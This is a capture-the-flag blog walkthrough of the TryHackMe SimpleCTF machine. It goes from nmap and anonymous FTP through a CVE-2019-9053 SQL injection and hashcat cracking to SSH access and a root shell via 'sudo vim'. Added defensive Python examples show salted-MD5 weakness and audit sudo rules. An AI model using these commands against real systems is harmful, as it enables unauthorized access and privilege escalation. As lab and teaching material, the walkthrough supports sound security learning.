SimpleCTF Challenge!
The SimpleCTF challenge on TryHackMe! Here's a quick breakdown of my approach:
CYBERSECURITY, CTF
Leadhand
10/10/2025 · 4 min read


SimpleCTF: A Beginner-Friendly CTF Walkthrough
Introduction
SimpleCTF is a beginner-friendly Capture The Flag challenge that covers fundamental penetration testing concepts including enumeration, exploitation, and privilege escalation. This walkthrough details the methodology and tools used to compromise the target system and obtain root access.
Target IP: 10.10.129.8
Reconnaissance and Enumeration
Initial Port Scan
I started with an Nmap scan to identify open services on the target:
sudo nmap -Pn -sV 10.10.129.8
The scan revealed three open ports:
Port 21 (FTP) - vsftpd 3.0.3 with anonymous login enabled
Port 80 (HTTP) - Apache httpd 2.4.18 running on Ubuntu
Port 2222 (SSH) - OpenSSH 7.2p2
A more aggressive scan with script enumeration provided additional details, including the presence of a robots.txt file on the web server with disallowed entries pointing to /openemr-5_0_1_3.
FTP Enumeration
Since anonymous FTP login was enabled, I connected to investigate:
ftp 10.10.129.8
After logging in anonymously, I discovered a file named ForMitch.txt in the /pub directory. I downloaded it using:
get ForMitch.txt
This file likely contained useful information for later stages of the attack.
Web Application Enumeration
I used Gobuster to enumerate directories on the web server:
gobuster dir --url http://10.10.129.8/ --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
This revealed a /simple directory, which turned out to be running CMS Made Simple.
Exploitation
CMS Made Simple Vulnerability (CVE-2019-9053)
After identifying the CMS, I searched for known vulnerabilities and found CVE-2019-9053, a SQL injection vulnerability in CMS Made Simple. I located an exploit on Exploit-DB (https://www.exploit-db.com/exploits/46635).
Running the exploit revealed:
Username: mitch
Email: admin@admin.com
Password hash: 0c01f4468bd75d7a84c7eb73846e8d96
Salt: 1dac0d92e9fa6bb2
Password Cracking
I used Hashcat to crack the MD5 hash with salt:
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt
The password was successfully cracked: secret
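Why this hash fell to a wordlist so quickly, as an added example (not code from the original walkthrough or from CMS Made Simple): the sketch reproduces the single-round md5(salt + password) layout that hashcat mode 20 targets, using the values recovered above, beside a PBKDF2-HMAC-SHA256 replacement. The function names and the iteration count are assumptions made for illustration.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import time

# Values recovered in the walkthrough above.
SALT = "1dac0d92e9fa6bb2"
STORED = "0c01f4468bd75d7a84c7eb73846e8d96"
PBKDF2_ITERATIONS = 600_000  # assumption; tune to your hardware and guidance


def legacy_hash(salt: str, password: str) -> str:
    """Weak form: one round of md5(salt + password)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def legacy_verify(salt: str, password: str, stored: str) -> bool:
    return hmac.compare_digest(legacy_hash(salt, password), stored)


def hardened_hash(password: str, salt: bytes | None = None) -> tuple[bytes, bytes]:
    """Hardened form: random 16-byte salt and a deliberately slow KDF."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def hardened_verify(password: str, salt: bytes, digest: bytes) -> bool:
    return hmac.compare_digest(hardened_hash(password, salt)[1], digest)


def cost_per_guess(fn, *args, rounds: int = 1) -> float:
    """Average wall-clock seconds for one hash computation."""
    start = time.perf_counter()
    for _ in range(rounds):
        fn(*args)
    return (time.perf_counter() - start) / rounds


if __name__ == "__main__":
    print("legacy hash matches:", legacy_verify(SALT, "secret", STORED))
    fast = cost_per_guess(legacy_hash, SALT, "secret", rounds=10_000)
    slow = cost_per_guess(hardened_hash, "secret", b"\x00" * 16)
    print(f"md5: {fast:.2e} s/guess, pbkdf2: {slow:.2e} s/guess, ratio ~{slow / fast:,.0f}x")
```

A slow KDF raises the cost of every guess; it does not rescue a password that sits near the top of a common wordlist.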
SSH Access
With valid credentials (mitch:secret), I connected via SSH on the non-standard port:
ssh mitch@10.10.129.8 -p 2222
After gaining initial access, I spawned a proper bash shell for better interaction.
Privilege Escalation
Sudo Privileges Check
I checked what commands the user could run with sudo:
sudo -l
The output revealed that mitch could run /usr/bin/vim as root without a password:
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
Exploiting Vim for Root Access
Using GTFOBins (https://gtfobins.github.io/gtfobins/vim/#sudo), I leveraged vim's command execution capability to spawn a root shell:
sudo vim -c ':!/bin/sh'
This granted me a root shell, allowing me to navigate to /root and capture the final flag:
cd /root
cat root.txt
Flag: W3ll d0n3. You made it!
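From the defender's side, the sudo rule above is something an audit should catch before an attacker does. The following is an added example, not part of the original walkthrough: it parses `sudo -l` output and flags rules that hand out binaries able to run other commands. The `SHELL_CAPABLE` list, the function name and the sample rules other than the vim one are assumptions.

```python
from __future__ import annotations

import os
import re

# Programs that can launch arbitrary commands from inside themselves
# (editors, pagers, interpreters). Short illustrative list, an assumption;
# extend it from a reference such as GTFOBins.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                 "python", "python3", "perl", "ruby", "bash", "sh", "env"}

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/vim"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(output: str) -> list[dict]:
    """Return one finding per risky command listed in `sudo -l` output."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines, Defaults entries, blanks
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            path = cmd.partition(" ")[0]
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted ALL")
            elif os.path.basename(path) in SHELL_CAPABLE and "NOEXEC" not in tags:
                reasons.append("shell-capable binary without NOEXEC")
            if reasons and "NOPASSWD" in tags:
                reasons.append("no password required")
            if reasons:
                findings.append({"runas": m["runas"], "command": cmd, "reasons": reasons})
    return findings


# Constructed sample: the rule from the walkthrough plus two made-up rules.
SAMPLE = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /sbin/shutdown -r now
    (root) NOEXEC: /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print(f"{f['runas']}: {f['command']} -> {', '.join(f['reasons'])}")
```

Where a user only needs to edit specific files as root, a `sudoedit` rule with explicit file paths avoids running the editor itself as root.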
Key Takeaways
This CTF reinforced several important concepts:
Thorough enumeration is critical - Multiple services and directories needed investigation
Default credentials and misconfigurations - Anonymous FTP access provided valuable reconnaissance data
Known vulnerabilities - Outdated CMS versions are low-hanging fruit for attackers
Sudo misconfigurations - Allowing unrestricted access to powerful tools like vim can lead to privilege escalation
Multiple attack vectors - This challenge combined web exploitation, password cracking, and Linux privilege escalation
Tools Used
Nmap (port scanning and service enumeration)
FTP client (anonymous access)
Gobuster (directory enumeration)
Hashcat (password cracking)
SSH (remote access)
GTFOBins (privilege escalation reference)
This was an excellent introductory CTF that demonstrated a realistic attack chain from initial reconnaissance through to full system compromise.